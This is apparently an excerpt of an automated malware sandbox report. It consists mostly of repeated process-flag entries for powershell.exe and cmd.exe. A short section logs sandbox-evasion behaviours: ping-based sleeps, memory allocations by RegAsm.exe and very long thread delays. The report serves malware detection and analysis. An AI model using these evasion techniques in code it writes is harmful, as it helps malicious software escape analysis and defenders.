Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2840000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 29D0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 49D0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2A20000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2C00000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4D00000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 3160000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 3310000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 3180000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 7E0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2230000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4330000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 10F0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2CC0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4CC0000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
